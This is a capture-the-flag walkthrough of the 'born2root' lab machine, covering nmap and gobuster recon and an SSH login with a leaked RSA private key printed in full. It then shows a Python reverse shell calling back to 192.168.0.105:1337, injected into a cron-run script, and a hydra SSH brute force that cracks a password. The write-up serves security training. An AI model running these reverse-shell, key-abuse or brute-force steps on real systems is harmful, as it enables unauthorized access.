This machine was full of rabbit-holes. Basic Recon was related with sub-directory enumeration.
initial port scan here which is as:
# Nmap 7.92 scan initiated Sun Jun 19 23:42:31 2022 as: nmap -p- -Pn -oN nmap/allport born2root
Nmap scan report for born2root (192.168.0.102)
Host is up (0.00073s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
57706/tcp open unknown
# Nmap done at Sun Jun 19 23:42:36 2022 -- 1 IP address (1 host up) scanned in 5.32 seconds
nmap scan with default nmap scripts and version detection here which is as:
# Nmap 7.92 scan initiated Sun Jun 19 23:43:55 2022 as: nmap -Pn -sC -sV -p22,80,111,57706 -oA nmap/script born2root
Nmap scan report for born2root (192.168.0.102)
Host is up (0.0029s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
| 2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
| 256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_ 256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 2 disallowed entries
|_/wordpress-blog /files
|_http-title: Secretsec Company
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36468/tcp6 status
| 100024 1 47099/udp status
| 100024 1 52621/udp6 status
|_ 100024 1 57706/tcp status
57706/tcp open status 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 19 23:44:07 2022 -- 1 IP address (1 host up) scanned in 11.92 seconds
Gobuster scan at port 80:
Gobuster scan here which is as:
/.htpasswd (Status: 403) [Size: 293]
/.htaccess (Status: 403) [Size: 293]
/.hta (Status: 403) [Size: 288]
/files (Status: 301) [Size: 306] [--> http://born2root/files/]
/icons (Status: 301) [Size: 306] [--> http://born2root/icons/]
/index.html (Status: 200) [Size: 5651]
/manual (Status: 301) [Size: 307] [--> http://born2root/manual/]
/robots.txt (Status: 200) [Size: 57]
/server-status (Status: 403) [Size: 297]
From the /icons subdirectory got VDSoyuAXiO.txt which had a private ssh key.
wget http://192.168.0.104/icons/VDSoyuAXiO.txt
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC
tprVUPb+fmkKvOf5ntACY7c/5fM4y83+UWPG0l90WrjdaTCPaGAHjEpZYKt0lEc0
FiQkXTvJS4faYHNah/mEvhldgTc59jeX4di0f660mJjF31SA9UgMLQReKd5GKtUx
5m+sQq6L+VyA2/6GD/T3qx35AT4argdk1NZ9ONmj1ZcIp0evVJvUul34zuJZ5mDv
DZuLRR6QpcMLJRGEFZ4qwkMZn7NavEmfX1Yka6mu9iwxkY6iT45YA1C4p7NEi5yI
/P6kDxMfCVELAUaU8fcPolkZ6xLdS6yyThZHHwIDAQABAoIBAAZ+clCTTA/E3n7E
LL/SvH3oGQd16xh9O2FyR4YIQMWQKwb7/OgOfEpWjpPf/dT+sK9eypnoDiZkmYhw
+rGii6Z2wCXhjN7wXPnj1qotXkpu4bgS3+F8+BLjlQ79ny2Busf+pQNf1syexDJS
sEkoDLGTBiubD3Ii4UoF7KfsozihdmQY5qud2c4iE0ioayo2m9XIDreJEB20Q5Ta
lV0G03unv/v7OK3g8dAQHrBR9MXuYiorcwxLAe+Gm1h4XanMKDYM5/jW4JO2ITAn
kPducC9chbM4NqB3ryNCD4YEgx8zWGDt0wjgyfnsF4fiYEI6tqAwWoB0tdqJFXAy
FlQJfYECgYEAz1bFCpGBCApF1k/oaQAyy5tir5NQpttCc0L2U1kiJWNmJSHk/tTX
4+ly0CBUzDkkedY1tVYK7TuH7/tOjh8M1BLa+g+Csb/OWLuMKmpoqyaejmoKkLnB
WVGkcdIulfsW7DWVMS/zA8ixJpt7bvY7Y142gkurxqjLMz5s/xT9geECgYEAxpfC
fGvogWRYUY07OLE/b7oMVOdBQsmlnaKVybuKf3RjeCYhbiRSzKz05NM/1Cqf359l
Wdznq4fkIvr6khliuj8GuCwv6wKn9+nViS18s1bG6Z5UJYSRJRpviCS+9BGShG1s
KOf1fAWNwRcn1UKtdQVvaLBX9kIwcmTBrl+e6P8CgYAtz24Zt6xaqmpjv6QKDxEq
C1rykAnx0+AKt3DVWYxB1oRrD+IYq85HfPzxHzOdK8LzaHDVb/1aDR0r2MqyfAnJ
kaDwPx0RSN++mzGM7ZXSuuWtcaCD+YbOxUsgGuBQIvodlnkwNPfsjhsV/KR5D85v
VhGVGEML0Z+T4ucSNQEOAQKBgQCHedfvUR3Xx0CIwbP4xNHlwiHPecMHcNBObS+J
4ypkMF37BOghXx4tCoA16fbNIhbWUsKtPwm79oQnaNeu+ypiq8RFt78orzMu6JIH
dsRvA2/Gx3/X6Eur6BDV61to3OP6+zqh3TuWU6OUadt+nHIANqj93e7jy9uI7jtC
XXDmuQKBgHZAE6GTq47k4sbFbWqldS79yhjjLloj0VUhValZyAP6XV8JTiAg9CYR
2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43
rlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+
-----END RSA PRIVATE KEY-----
Got 3 usernames from the /index.php file and used the above key and the usernames to get into the server.
Since there were 3 users listed in /index.php file, it was manually checked for the ssh. A flag PubkeyAcceptedTypes=+ssh-rsa was added.
Got into the machine as martin from the above ssh-private key.
martin Looking at the crontab, there was a script,
/tmp/sekurity.pywhich was executed as the userjimmyand it was a python script. So, used a python reverse shell to get into the machine asjimmy. Script:import socket,os,pty s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.0.105",1337)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) pty.spawn("/bin/sh")and saved it in
/tmp/sekurity.pyand had nc listening at the local machine.
jimmy
After getting the reverse shell from the crontab, had a look into the files of the home directory. Found a file named networker.
using find / -perm /4000 2>/dev/null to get the suid binaries, found the /home/jimmy/networker which was the same file which could be executed from the user jimmy.
/sbin/mount.nfs
/bin/umount
/bin/mount
/bin/su
/home/jimmy/networker
/usr/sbin/exim4
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
networker was a compiled c file using GCC compiler. strings into the file got:
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
puts
printf
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.1.3
GLIBC_2.0
UWVS
t$,U
[^_]
*** Networker 2.0 ***
/sbin/ifconfig
/bin/ping -c 1 localhost
Done
echo 'echo linux tool version 5'
;*2$"
GCC: (Debian 6.3.0-12) 6.3.0 20170406
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6578
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
networker.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
printf@@GLIBC_2.0
_edata
__x86.get_pc_thunk.dx
__cxa_finalize@@GLIBC_2.1.3
__data_start
puts@@GLIBC_2.0
system@@GLIBC_2.0
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_fp_hw
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment
Observing the file, found the commands used there which are:
/sbin/ifconfig
/bin/ping -c 1 localhost
Done
echo 'echo linux tool version 5'
;*2$"
These commands have a well defined path specified to the command file and didn’t have input fields as it was used to ping the localhost once. So this was probably not the way to go.
Getting LinPeas.sh into the system to find the exploit.
Used scp as wget and curl were overridden by a dummy script.
scp -i id_rsa -o 'PubkeyAcceptedKeyTypes=+ssh-rsa' linpeas.sh [email protected]:/tmp/
and from user martin cd /tmp && chmod 777 linpeas.sh
Using the linpeas from the user jimmy. Got nothing but the same networker which couldn’t be exploited.
After a number of attempts to escalate the privileges from the foothold and getting failed, and getting no clue from linpeas.sh, Got back to the port 80 for further enumeration.
There were 3 users, out of which 2 users were compromised, and the remaining user was hadi. And from the initial foothold, it was clear that the user hadi could be accessed from ssh as there was a .ssh file in /home/hadi.
So from rockyou.txt filtering the keyword hadi and trying to bruteforce into ssh using hydra seemed to be a option to try.
Used cat /usr/share/wordlists/rockyou.txt | grep hadi > hadi_refined.txt to get the keywords realted to hadi.
Used hydra -l hadi -P hadi_refined.txt ssh://born2root -f to bruteforce into the server with the generated wordlist and username hadi.
hydra -l hadi -P hadi_refined.txt ssh://born2root -f
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-28 22:19:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1581 login tries (l:1/p:1581), ~99 tries per task
[DATA] attacking ssh://born2root:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 1405 to do in 00:08h, 16 active
[22][ssh] host: born2root login: hadi password: hadi123
[STATUS] attack finished for born2root (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-06-28 22:20:59
Got into the server with username hadi and password hadi123.
hadi Checked if there were sudoers miconfiguration using
sudo -lbut-bash: sudo : commande introuvablewas shown. So, triedsuand used the passwordhadi123to get the privileges escalated to root and voila, it was done.
Finally, pwnned the machine!